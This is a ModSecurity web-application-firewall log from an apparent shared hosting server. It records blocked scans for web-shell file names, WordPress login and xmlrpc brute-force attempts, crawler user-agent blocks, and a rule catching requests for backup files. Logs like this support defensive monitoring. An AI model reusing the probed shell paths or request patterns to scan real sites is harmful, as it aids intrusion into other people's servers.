[Tue May 26 17:34:51.433904 2026] [security2:error] [pid 891273:tid 891418] [client 57.141.2.16:0] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "404"] [hostname "mosykay.com"] [uri "/index.php"] [unique_id "ahWMY8DEzZ8z3jtDm82y-QAAAA8"]
[Tue May 26 17:34:51.465994 2026] [security2:error] [pid 891273:tid 891443] [client 20.196.127.68:2142] ModSecurity: Access denied with code 409 (phase 1). RBL lookup of 68.127.196.20.vulnscan.websitewelcome.com succeeded at REMOTE_ADDR. [file "/opt/mod_security/hg_rules.conf"] [line "1566"] [id "900933"] [msg "Vulnerability Scan RBL: vulnscan.websitewelcome.com"] [hostname "kardashevtechnologies.com"] [uri "/shell.php"] [unique_id "ahWMY8DEzZ8z3jtDm82zCgAAACg"]
[Tue May 26 17:34:52.068004 2026] [security2:error] [pid 894579:tid 894760] [client 20.196.127.68:1552] ModSecurity: Access denied with code 409 (phase 1). RBL lookup of 68.127.196.20.vulnscan.websitewelcome.com succeeded at REMOTE_ADDR. [file "/opt/mod_security/hg_rules.conf"] [line "1566"] [id "900933"] [msg "Vulnerability Scan RBL: vulnscan.websitewelcome.com"] [hostname "kardashevtechnologies.com"] [uri "/setup-config.php"] [unique_id "ahWMZAEtZWuWWBGzl__jVgAAATw"]
[Tue May 26 17:34:52.188837 2026] [security2:error] [pid 891273:tid 891390] [remote 121.200.216.55:55922] ModSecurity: Access denied with code 409 (phase 1). RBL lookup of 55.216.200.121.testwprbl.websitewelcome.com succeeded at REMOTE_ADDR. [file "/opt/mod_security/hg_rules.conf"] [line "176"] [id "900407"] [msg "Wordpress and Joomla Brute RBL: testwprbl.websitewelcome.com"] [hostname "freshmindsolutions.com"] [uri "/wp-login.php"] [unique_id "ahWMZMDEzZ8z3jtDm82zFwAAanQ"]
[Tue May 26 17:34:52.715508 2026] [security2:error] [pid 894579:tid 894811] [client 20.196.127.68:2424] ModSecurity: Access denied with code 409 (phase 1). RBL lookup of 68.127.196.20.vulnscan.websitewelcome.com succeeded at REMOTE_ADDR. [file "/opt/mod_security/hg_rules.conf"] [line "1566"] [id "900933"] [msg "Vulnerability Scan RBL: vulnscan.websitewelcome.com"] [hostname "kardashevtechnologies.com"] [uri "/t.php"] [unique_id "ahWMZAEtZWuWWBGzl__jbQAAAW4"]
[Tue May 26 17:34:53.323943 2026] [security2:error] [pid 891273:tid 891428] [client 20.196.127.68:2372] ModSecurity: Access denied with code 409 (phase 1). RBL lookup of 68.127.196.20.vulnscan.websitewelcome.com succeeded at REMOTE_ADDR. [file "/opt/mod_security/hg_rules.conf"] [line "1566"] [id "900933"] [msg "Vulnerability Scan RBL: vulnscan.websitewelcome.com"] [hostname "kardashevtechnologies.com"] [uri "/up.php"] [unique_id "ahWMZcDEzZ8z3jtDm82zPAAAABk"]
[Tue May 26 17:34:53.927361 2026] [security2:error] [pid 894579:tid 894824] [client 20.196.127.68:7640] ModSecurity: Access denied with code 409 (phase 1). RBL lookup of 68.127.196.20.vulnscan.websitewelcome.com succeeded at REMOTE_ADDR. [file "/opt/mod_security/hg_rules.conf"] [line "1566"] [id "900933"] [msg "Vulnerability Scan RBL: vulnscan.websitewelcome.com"] [hostname "kardashevtechnologies.com"] [uri "/ultra.php"] [unique_id "ahWMZQEtZWuWWBGzl__jogAAAXs"]
[Tue May 26 17:34:53.958139 2026] [security2:error] [pid 894579:tid 894760] [client 57.141.2.10:0] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "404"] [hostname "mosykay.com"] [uri "/index.php"] [unique_id "ahWMZQEtZWuWWBGzl__jjAAAATw"]
[Tue May 26 17:34:54.510598 2026] [security2:error] [pid 891273:tid 891407] [client 20.196.127.68:2140] ModSecurity: Access denied with code 409 (phase 1). RBL lookup of 68.127.196.20.vulnscan.websitewelcome.com succeeded at REMOTE_ADDR. [file "/opt/mod_security/hg_rules.conf"] [line "1566"] [id "900933"] [msg "Vulnerability Scan RBL: vulnscan.websitewelcome.com"] [hostname "kardashevtechnologies.com"] [uri "/vv.php"] [unique_id "ahWMZsDEzZ8z3jtDm82zUwAAAAQ"]
[Tue May 26 17:34:54.905649 2026] [security2:error] [pid 894579:tid 894725] [client 223.235.98.214:25290] ModSecurity: Access denied with code 409 (phase 1). RBL lookup of 214.98.235.223.testwprbl.websitewelcome.com succeeded at REMOTE_ADDR. [file "/opt/mod_security/hg_rules.conf"] [line "176"] [id "900407"] [msg "Wordpress and Joomla Brute RBL: testwprbl.websitewelcome.com"] [hostname "thriveswift.com"] [uri "/xmlrpc.php"] [unique_id "ahWMZgEtZWuWWBGzl__jvQAAARk"]
[Tue May 26 17:34:54.905764 2026] [security2:error] [pid 894579:tid 894725] [client 223.235.98.214:25290] ModSecurity: Warning. Pattern match "POST" at REQUEST_METHOD. [file "/opt/mod_security/hg_rules.conf"] [line "151"] [id "900405"] [msg "xmlrpc POST logging"] [data "409"] [hostname "thriveswift.com"] [uri "/xmlrpc.php"] [unique_id "ahWMZgEtZWuWWBGzl__jvQAAARk"]
[Tue May 26 17:34:55.155476 2026] [security2:error] [pid 894579:tid 894766] [client 20.196.127.68:2358] ModSecurity: Access denied with code 409 (phase 1). RBL lookup of 68.127.196.20.vulnscan.websitewelcome.com succeeded at REMOTE_ADDR. [file "/opt/mod_security/hg_rules.conf"] [line "1566"] [id "900933"] [msg "Vulnerability Scan RBL: vulnscan.websitewelcome.com"] [hostname "kardashevtechnologies.com"] [uri "/V5.php"] [unique_id "ahWMZwEtZWuWWBGzl__jyQAAAUI"]
[Tue May 26 17:34:55.738152 2026] [security2:error] [pid 891273:tid 891501] [client 57.141.2.9:0] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "404"] [hostname "mosykay.com"] [uri "/index.php"] [unique_id "ahWMZ8DEzZ8z3jtDm82zbgAAAGI"]
[Tue May 26 17:34:55.765404 2026] [security2:error] [pid 894579:tid 894822] [client 20.196.127.68:4120] ModSecurity: Access denied with code 409 (phase 1). RBL lookup of 68.127.196.20.vulnscan.websitewelcome.com succeeded at REMOTE_ADDR. [file "/opt/mod_security/hg_rules.conf"] [line "1566"] [id "900933"] [msg "Vulnerability Scan RBL: vulnscan.websitewelcome.com"] [hostname "kardashevtechnologies.com"] [uri "/wp-user.php"] [unique_id "ahWMZwEtZWuWWBGzl__j2wAAAXk"]
[Tue May 26 17:34:56.345666 2026] [security2:error] [pid 894579:tid 894793] [client 20.196.127.68:9266] ModSecurity: Access denied with code 409 (phase 1). RBL lookup of 68.127.196.20.vulnscan.websitewelcome.com succeeded at REMOTE_ADDR. [file "/opt/mod_security/hg_rules.conf"] [line "1566"] [id "900933"] [msg "Vulnerability Scan RBL: vulnscan.websitewelcome.com"] [hostname "kardashevtechnologies.com"] [uri "/wp-blog.php"] [unique_id "ahWMaAEtZWuWWBGzl__j9AAAAVw"]
[Tue May 26 17:34:56.986900 2026] [security2:error] [pid 894579:tid 894734] [client 20.196.127.68:2430] ModSecurity: Access denied with code 409 (phase 1). RBL lookup of 68.127.196.20.vulnscan.websitewelcome.com succeeded at REMOTE_ADDR. [file "/opt/mod_security/hg_rules.conf"] [line "1566"] [id "900933"] [msg "Vulnerability Scan RBL: vulnscan.websitewelcome.com"] [hostname "kardashevtechnologies.com"] [uri "/wp.php"] [unique_id "ahWMaAEtZWuWWBGzl__kBgAAASI"]
[Tue May 26 17:34:57.617419 2026] [security2:error] [pid 891273:tid 891512] [client 20.196.127.68:7663] ModSecurity: Access denied with code 409 (phase 1). RBL lookup of 68.127.196.20.vulnscan.websitewelcome.com succeeded at REMOTE_ADDR. [file "/opt/mod_security/hg_rules.conf"] [line "1566"] [id "900933"] [msg "Vulnerability Scan RBL: vulnscan.websitewelcome.com"] [hostname "kardashevtechnologies.com"] [uri "/worksec.php"] [unique_id "ahWMacDEzZ8z3jtDm82zlAAAAG0"]
[Tue May 26 17:34:58.196135 2026] [security2:error] [pid 891273:tid 891460] [client 20.196.127.68:2312] ModSecurity: Access denied with code 409 (phase 1). RBL lookup of 68.127.196.20.vulnscan.websitewelcome.com succeeded at REMOTE_ADDR. [file "/opt/mod_security/hg_rules.conf"] [line "1566"] [id "900933"] [msg "Vulnerability Scan RBL: vulnscan.websitewelcome.com"] [hostname "kardashevtechnologies.com"] [uri "/wp-themes.php"] [unique_id "ahWMasDEzZ8z3jtDm82znwAAADk"]
[Tue May 26 17:34:58.510088 2026] [security2:error] [pid 891273:tid 891426] [client 114.119.139.43:43023] ModSecurity: Access denied with code 406 (phase 1). Pattern match "ZoominfoBot|NetcraftSurveyAgent|MJ12bot|(?i:BUbiNG)|D(?i:otbot)| oBot/|MegaIndex\\\\.ru|Barkrowler|Spbot|DomainCrawler|Seznam|CCBot|SiteExplorer|OpenLinkProfiler|Sogou web spider|360Spider|Semrush|Panscient|crawler\\\\.feedback([+]\\\\S+)?@gmail\\\\.com|MauiBo ..." at REQUEST_HEADERS:User-Agent. [file "/opt/mod_security/hg_rules.conf"] [line "585"] [id "999812"] [msg "Problematic Crawler"] [hostname "rainadelproperties.com"] [uri "/properties/family-house-in-hudson/"] [unique_id "ahWMasDEzZ8z3jtDm82zoQAAABc"], referer: https://rainadelproperties.com/
[Tue May 26 17:34:58.519822 2026] [security2:error] [pid 894579:tid 894835] [client 57.141.2.15:0] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "404"] [hostname "mosykay.com"] [uri "/index.php"] [unique_id "ahWMagEtZWuWWBGzl__kPwAAAYY"]
[Tue May 26 17:34:58.778588 2026] [security2:error] [pid 894579:tid 894795] [client 20.196.127.68:2113] ModSecurity: Access denied with code 409 (phase 1). RBL lookup of 68.127.196.20.vulnscan.websitewelcome.com succeeded at REMOTE_ADDR. [file "/opt/mod_security/hg_rules.conf"] [line "1566"] [id "900933"] [msg "Vulnerability Scan RBL: vulnscan.websitewelcome.com"] [hostname "kardashevtechnologies.com"] [uri "/wp-signin.php"] [unique_id "ahWMagEtZWuWWBGzl__kWwAAAV4"]
[Tue May 26 17:34:59.427757 2026] [security2:error] [pid 891273:tid 891412] [client 20.196.127.68:2396] ModSecurity: Access denied with code 409 (phase 1). RBL lookup of 68.127.196.20.vulnscan.websitewelcome.com succeeded at REMOTE_ADDR. [file "/opt/mod_security/hg_rules.conf"] [line "1566"] [id "900933"] [msg "Vulnerability Scan RBL: vulnscan.websitewelcome.com"] [hostname "kardashevtechnologies.com"] [uri "/wp-blog-header.php"] [unique_id "ahWMa8DEzZ8z3jtDm82zuwAAAAk"]
[Tue May 26 17:35:00.752923 2026] [security2:error] [pid 894579:tid 894726] [client 15.235.27.193:61232] ModSecurity: Access denied with code 406 (phase 1). Pattern match "Mozilla\\\\/5\\\\.0 \\\\(compatible; AhrefsBot\\\\/\\\\d\\\\.\\\\d; \\\\+http:\\\\/\\\\/ahrefs\\\\.com\\\\/robot\\\\/\\\\)" at REQUEST_HEADERS:User-Agent. [file "/opt/mod_security/hg_rules.conf"] [line "578"] [id "900165"] [msg "AhrefsBot BOT Request"] [hostname "www.amslca.com"] [uri "/robots.txt"] [unique_id "ahWMbAEtZWuWWBGzl__kpwAAARo"]
[Tue May 26 17:35:00.753069 2026] [security2:error] [pid 894579:tid 894726] [client 15.235.27.193:61232] ModSecurity: Warning. Matched phrase "AhrefsBot" at REQUEST_HEADERS:User-Agent. [file "/opt/mod_security/hg_rules.conf"] [line "168"] [id "350001"] [msg "BAD BOT - Detected LOGGING"] [data "406"] [hostname "www.amslca.com"] [uri "/robots.txt"] [unique_id "ahWMbAEtZWuWWBGzl__kpwAAARo"]
[Tue May 26 17:35:01.092099 2026] [security2:error] [pid 894579:tid 894795] [client 57.141.2.33:0] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "404"] [hostname "mosykay.com"] [uri "/index.php"] [unique_id "ahWMbAEtZWuWWBGzl__koQAAAV4"]
[Tue May 26 17:35:02.074712 2026] [security2:error] [pid 894579:tid 894821] [client 20.196.127.68:0] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "301"] [hostname "kardashevtechnologies.com"] [uri "/index.php"] [unique_id "ahWMbAEtZWuWWBGzl__kigAAAXg"]
[Tue May 26 17:35:02.119036 2026] [security2:error] [pid 894579:tid 894807] [client 54.39.136.227:46646] ModSecurity: Access denied with code 406 (phase 1). Pattern match "Mozilla\\\\/5\\\\.0 \\\\(compatible; AhrefsBot\\\\/\\\\d\\\\.\\\\d; \\\\+http:\\\\/\\\\/ahrefs\\\\.com\\\\/robot\\\\/\\\\)" at REQUEST_HEADERS:User-Agent. [file "/opt/mod_security/hg_rules.conf"] [line "578"] [id "900165"] [msg "AhrefsBot BOT Request"] [hostname "www.amslca.com"] [uri "/"] [unique_id "ahWMbgEtZWuWWBGzl__k2AAAAWo"]
[Tue May 26 17:35:02.119139 2026] [security2:error] [pid 894579:tid 894807] [client 54.39.136.227:46646] ModSecurity: Warning. Matched phrase "AhrefsBot" at REQUEST_HEADERS:User-Agent. [file "/opt/mod_security/hg_rules.conf"] [line "168"] [id "350001"] [msg "BAD BOT - Detected LOGGING"] [data "406"] [hostname "www.amslca.com"] [uri "/"] [unique_id "ahWMbgEtZWuWWBGzl__k2AAAAWo"]
[Tue May 26 17:35:02.268319 2026] [security2:error] [pid 894579:tid 894781] [client 20.196.127.68:4148] ModSecurity: Access denied with code 409 (phase 1). RBL lookup of 68.127.196.20.vulnscan.websitewelcome.com succeeded at REMOTE_ADDR. [file "/opt/mod_security/hg_rules.conf"] [line "1566"] [id "900933"] [msg "Vulnerability Scan RBL: vulnscan.websitewelcome.com"] [hostname "kardashevtechnologies.com"] [uri "/ws.php"] [unique_id "ahWMbgEtZWuWWBGzl__k4QAAAVA"]
[Tue May 26 17:35:02.491637 2026] [security2:error] [pid 894579:tid 894657] [remote 141.95.202.18:47910] ModSecurity: Access denied with code 409 (phase 1). RBL lookup of 18.202.95.141.testwprbl.websitewelcome.com succeeded at REMOTE_ADDR. [file "/opt/mod_security/hg_rules.conf"] [line "176"] [id "900407"] [msg "Wordpress and Joomla Brute RBL: testwprbl.websitewelcome.com"] [hostname "thedebateafrica.org"] [uri "/wp-login.php"] [unique_id "ahWMbgEtZWuWWBGzl__k4gABDE0"]
[Tue May 26 17:35:02.900743 2026] [security2:error] [pid 891273:tid 891435] [client 20.196.127.68:4130] ModSecurity: Access denied with code 409 (phase 1). RBL lookup of 68.127.196.20.vulnscan.websitewelcome.com succeeded at REMOTE_ADDR. [file "/opt/mod_security/hg_rules.conf"] [line "1566"] [id "900933"] [msg "Vulnerability Scan RBL: vulnscan.websitewelcome.com"] [hostname "kardashevtechnologies.com"] [uri "/wsa.php"] [unique_id "ahWMbsDEzZ8z3jtDm820FwAAACA"]
[Tue May 26 17:35:03.143965 2026] [security2:error] [pid 894579:tid 894837] [client 85.254.64.41:0] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "404"] [hostname "doyecpa.com"] [uri "/index.php"] [unique_id "ahWMbgEtZWuWWBGzl__k6AAAAYg"]
[Tue May 26 17:35:03.248142 2026] [security2:error] [pid 894579:tid 894747] [client 57.141.2.29:0] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "404"] [hostname "mosykay.com"] [uri "/index.php"] [unique_id "ahWMbgEtZWuWWBGzl__k-QAAAS8"]
[Tue May 26 17:35:03.485904 2026] [security2:error] [pid 891273:tid 891476] [client 20.196.127.68:4108] ModSecurity: Access denied with code 409 (phase 1). RBL lookup of 68.127.196.20.vulnscan.websitewelcome.com succeeded at REMOTE_ADDR. [file "/opt/mod_security/hg_rules.conf"] [line "1566"] [id "900933"] [msg "Vulnerability Scan RBL: vulnscan.websitewelcome.com"] [hostname "kardashevtechnologies.com"] [uri "/w.php"] [unique_id "ahWMb8DEzZ8z3jtDm820JQAAAEk"]
[Tue May 26 17:35:04.004225 2026] [security2:error] [pid 894579:tid 894821] [client 31.57.184.20:49564] ModSecurity: Access denied with code 409 (phase 1). RBL lookup of 20.184.57.31.testwprbl.websitewelcome.com succeeded at REMOTE_ADDR. [file "/opt/mod_security/hg_rules.conf"] [line "176"] [id "900407"] [msg "Wordpress and Joomla Brute RBL: testwprbl.websitewelcome.com"] [hostname "shirdisaibabatemple.org"] [uri "/wp-login.php"] [unique_id "ahWMbwEtZWuWWBGzl__lGAAAAXg"], referer: https://duckduckgo.com/
[Tue May 26 17:35:04.099324 2026] [security2:error] [pid 891273:tid 891464] [client 20.196.127.68:9267] ModSecurity: Access denied with code 409 (phase 1). RBL lookup of 68.127.196.20.vulnscan.websitewelcome.com succeeded at REMOTE_ADDR. [file "/opt/mod_security/hg_rules.conf"] [line "1566"] [id "900933"] [msg "Vulnerability Scan RBL: vulnscan.websitewelcome.com"] [hostname "kardashevtechnologies.com"] [uri "/x.php"] [unique_id "ahWMcMDEzZ8z3jtDm820NgAAAD0"]
[Tue May 26 17:35:04.413294 2026] [security2:error] [pid 894579:tid 894830] [client 31.57.184.20:49978] ModSecurity: Access denied with code 409 (phase 1). RBL lookup of 20.184.57.31.testwprbl.websitewelcome.com succeeded at REMOTE_ADDR. [file "/opt/mod_security/hg_rules.conf"] [line "176"] [id "900407"] [msg "Wordpress and Joomla Brute RBL: testwprbl.websitewelcome.com"] [hostname "shirdisaibabatemple.org"] [uri "/wp-login.php"] [unique_id "ahWMcAEtZWuWWBGzl__lKgAAAYE"], referer: https://www.bing.com/
[Tue May 26 17:35:04.730963 2026] [security2:error] [pid 891273:tid 891416] [client 20.196.127.68:1544] ModSecurity: Access denied with code 409 (phase 1). RBL lookup of 68.127.196.20.vulnscan.websitewelcome.com succeeded at REMOTE_ADDR. [file "/opt/mod_security/hg_rules.conf"] [line "1566"] [id "900933"] [msg "Vulnerability Scan RBL: vulnscan.websitewelcome.com"] [hostname "kardashevtechnologies.com"] [uri "/xx.php"] [unique_id "ahWMcMDEzZ8z3jtDm820QQAAAA0"]
[Tue May 26 17:35:05.563267 2026] [security2:error] [pid 891273:tid 891489] [client 57.141.2.42:0] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "404"] [hostname "mosykay.com"] [uri "/index.php"] [unique_id "ahWMccDEzZ8z3jtDm820TwAAAFY"]
[Tue May 26 17:35:05.641638 2026] [security2:error] [pid 891273:tid 891520] [client 223.235.98.214:29423] ModSecurity: Access denied with code 409 (phase 1). RBL lookup of 214.98.235.223.testwprbl.websitewelcome.com succeeded at REMOTE_ADDR. [file "/opt/mod_security/hg_rules.conf"] [line "176"] [id "900407"] [msg "Wordpress and Joomla Brute RBL: testwprbl.websitewelcome.com"] [hostname "thriveswift.com"] [uri "/xmlrpc.php"] [unique_id "ahWMccDEzZ8z3jtDm820XwAAAHU"]
[Tue May 26 17:35:05.641755 2026] [security2:error] [pid 891273:tid 891520] [client 223.235.98.214:29423] ModSecurity: Warning. Pattern match "POST" at REQUEST_METHOD. [file "/opt/mod_security/hg_rules.conf"] [line "151"] [id "900405"] [msg "xmlrpc POST logging"] [data "409"] [hostname "thriveswift.com"] [uri "/xmlrpc.php"] [unique_id "ahWMccDEzZ8z3jtDm820XwAAAHU"]
[Tue May 26 17:35:05.648092 2026] [security2:error] [pid 894579:tid 894737] [client 20.196.127.68:4113] ModSecurity: Access denied with code 409 (phase 1). RBL lookup of 68.127.196.20.vulnscan.websitewelcome.com succeeded at REMOTE_ADDR. [file "/opt/mod_security/hg_rules.conf"] [line "1566"] [id "900933"] [msg "Vulnerability Scan RBL: vulnscan.websitewelcome.com"] [hostname "kardashevtechnologies.com"] [uri "/xmlrpc.php"] [unique_id "ahWMcQEtZWuWWBGzl__lUgAAASU"]
[Tue May 26 17:35:06.250575 2026] [security2:error] [pid 894579:tid 894806] [client 20.196.127.68:2399] ModSecurity: Access denied with code 409 (phase 1). RBL lookup of 68.127.196.20.vulnscan.websitewelcome.com succeeded at REMOTE_ADDR. [file "/opt/mod_security/hg_rules.conf"] [line "1566"] [id "900933"] [msg "Vulnerability Scan RBL: vulnscan.websitewelcome.com"] [hostname "kardashevtechnologies.com"] [uri "/y.php"] [unique_id "ahWMcgEtZWuWWBGzl__ldwAAAWk"]
[Tue May 26 17:35:07.376646 2026] [security2:error] [pid 894579:tid 894735] [client 57.141.2.20:0] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "404"] [hostname "mosykay.com"] [uri "/index.php"] [unique_id "ahWMcgEtZWuWWBGzl__lkAAAASM"]
[Tue May 26 17:35:08.810485 2026] [security2:error] [pid 894579:tid 894793] [client 172.86.66.156:52691] ModSecurity: Access denied with code 409 (phase 1). RBL lookup of 156.66.86.172.testwprbl.websitewelcome.com succeeded at REMOTE_ADDR. [file "/opt/mod_security/hg_rules.conf"] [line "176"] [id "900407"] [msg "Wordpress and Joomla Brute RBL: testwprbl.websitewelcome.com"] [hostname "www.cagmedya.com"] [uri "/xmlrpc.php"] [unique_id "ahWMdAEtZWuWWBGzl__lwwAAAVw"], referer: https://www.cagmedya.com/
[Tue May 26 17:35:08.810666 2026] [security2:error] [pid 894579:tid 894793] [client 172.86.66.156:52691] ModSecurity: Warning. Pattern match "POST" at REQUEST_METHOD. [file "/opt/mod_security/hg_rules.conf"] [line "151"] [id "900405"] [msg "xmlrpc POST logging"] [data "409"] [hostname "www.cagmedya.com"] [uri "/xmlrpc.php"] [unique_id "ahWMdAEtZWuWWBGzl__lwwAAAVw"], referer: https://www.cagmedya.com/
[Tue May 26 17:35:09.304276 2026] [security2:error] [pid 894579:tid 894581] [remote 74.7.241.58:47700] ModSecurity: Access denied with code 409 (phase 1). RBL lookup of 58.241.7.74.vulnscan.websitewelcome.com succeeded at REMOTE_ADDR. [file "/opt/mod_security/hg_rules.conf"] [line "1566"] [id "900933"] [msg "Vulnerability Scan RBL: vulnscan.websitewelcome.com"] [hostname "www.billing.mosykay.com"] [uri "/app/password/reset"] [unique_id "ahWMdQEtZWuWWBGzl__lzwABFQE"], referer: https://www.billing.mosykay.com/app/password/reset?path=/home1/taote1zo/www/afstpaul.org/wp-content/plugins/woocommerce/templates/emails
[Tue May 26 17:35:09.706688 2026] [security2:error] [pid 894579:tid 894763] [client 57.141.2.27:0] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "404"] [hostname "mosykay.com"] [uri "/index.php"] [unique_id "ahWMdQEtZWuWWBGzl__lzAAAAT8"]
[Tue May 26 17:35:11.718904 2026] [security2:error] [pid 891273:tid 891330] [remote 13.42.154.237:37138] ModSecurity: Access denied with code 409 (phase 1). RBL lookup of 237.154.42.13.testwprbl.websitewelcome.com succeeded at REMOTE_ADDR. [file "/opt/mod_security/hg_rules.conf"] [line "176"] [id "900407"] [msg "Wordpress and Joomla Brute RBL: testwprbl.websitewelcome.com"] [hostname "hassina-foundation.com"] [uri "/wp-login.php"] [unique_id "ahWMd8DEzZ8z3jtDm820rgAAITg"]
[Tue May 26 17:35:11.956158 2026] [security2:error] [pid 894579:tid 894740] [client 185.177.72.51:39346] ModSecurity: Access denied with code 406 (phase 2). Pattern match "\\\\.old$" at REQUEST_FILENAME. [file "/etc/httpd/modsecurity.d/10_asl_rules.conf"] [line "1263"] [id "390583"] [rev "1"] [msg "Atomicorp.com WAF Rules: Attack Blocked -  Data leakage - attempt to access backup file (disable this rule if you require access to files that end with .old)"] [severity "CRITICAL"] [hostname "www.herbalplus.thedebateafrica.org"] [uri "/user.php.old"] [unique_id "ahWMdwEtZWuWWBGzl__mDAAAASg"]
[Tue May 26 17:35:12.767208 2026] [security2:error] [pid 894579:tid 894776] [client 57.141.2.6:0] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "404"] [hostname "mosykay.com"] [uri "/index.php"] [unique_id "ahWMeAEtZWuWWBGzl__mIAAAAUs"]
[Tue May 26 17:35:14.940913 2026] [security2:error] [pid 894579:tid 894751] [client 57.141.2.43:0] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "404"] [hostname "mosykay.com"] [uri "/index.php"] [unique_id "ahWMegEtZWuWWBGzl__mfQAAATM"]
[Tue May 26 17:35:16.282597 2026] [security2:error] [pid 891273:tid 891490] [client 223.235.98.214:23354] ModSecurity: Access denied with code 409 (phase 1). RBL lookup of 214.98.235.223.testwprbl.websitewelcome.com succeeded at REMOTE_ADDR. [file "/opt/mod_security/hg_rules.conf"] [line "176"] [id "900407"] [msg "Wordpress and Joomla Brute RBL: testwprbl.websitewelcome.com"] [hostname "thriveswift.com"] [uri "/xmlrpc.php"] [unique_id "ahWMfMDEzZ8z3jtDm8209QAAAFc"]
[Tue May 26 17:35:16.282789 2026] [security2:error] [pid 891273:tid 891490] [client 223.235.98.214:23354] ModSecurity: Warning. Pattern match "POST" at REQUEST_METHOD. [file "/opt/mod_security/hg_rules.conf"] [line "151"] [id "900405"] [msg "xmlrpc POST logging"] [data "409"] [hostname "thriveswift.com"] [uri "/xmlrpc.php"] [unique_id "ahWMfMDEzZ8z3jtDm8209QAAAFc"]
[Tue May 26 17:35:16.810095 2026] [security2:error] [pid 891273:tid 891456] [client 114.119.148.237:40191] ModSecurity: Access denied with code 406 (phase 1). Pattern match "ZoominfoBot|NetcraftSurveyAgent|MJ12bot|(?i:BUbiNG)|D(?i:otbot)| oBot/|MegaIndex\\\\.ru|Barkrowler|Spbot|DomainCrawler|Seznam|CCBot|SiteExplorer|OpenLinkProfiler|Sogou web spider|360Spider|Semrush|Panscient|crawler\\\\.feedback([+]\\\\S+)?@gmail\\\\.com|MauiBo ..." at REQUEST_HEADERS:User-Agent. [file "/opt/mod_security/hg_rules.conf"] [line "585"] [id "999812"] [msg "Problematic Crawler"] [hostname "haddingtonwines.com"] [uri "/cart"] [unique_id "ahWMfMDEzZ8z3jtDm821DQAAADU"], referer: http://haddingtonwines.com/cart?remove_item=075b24b68eb3cb44b3fa4e331d86db89
[Tue May 26 17:35:17.231013 2026] [security2:error] [pid 894579:tid 894737] [client 66.249.66.14:44020] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "404"] [hostname "blettclms.com"] [uri "/index.php/robots.txt"] [unique_id "ahWMfAEtZWuWWBGzl__m0wAAASU"]
[Tue May 26 17:35:17.353007 2026] [security2:error] [pid 894579:tid 894756] [client 57.141.2.71:0] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "404"] [hostname "mosykay.com"] [uri "/index.php"] [unique_id "ahWMfAEtZWuWWBGzl__m2QAAATg"]
[Tue May 26 17:35:19.002597 2026] [security2:error] [pid 891273:tid 891501] [client 70.185.179.229:0] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "404"] [hostname "mosykay.com"] [uri "/index.php"] [unique_id "ahWMfsDEzZ8z3jtDm821MgAAAGI"]
[Tue May 26 17:35:19.157967 2026] [security2:error] [pid 894579:tid 894773] [client 57.141.2.32:0] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "404"] [hostname "mosykay.com"] [uri "/index.php"] [unique_id "ahWMfgEtZWuWWBGzl__nHgAAAUg"]
[Tue May 26 17:35:22.460292 2026] [security2:error] [pid 894579:tid 894824] [client 57.141.2.50:0] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "404"] [hostname "mosykay.com"] [uri "/index.php"] [unique_id "ahWMgQEtZWuWWBGzl__ngQAAAXs"]
[Tue May 26 17:35:23.613862 2026] [security2:error] [pid 894579:tid 894781] [client 57.141.2.57:0] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "404"] [hostname "mosykay.com"] [uri "/index.php"] [unique_id "ahWMgwEtZWuWWBGzl__nsAAAAVA"]
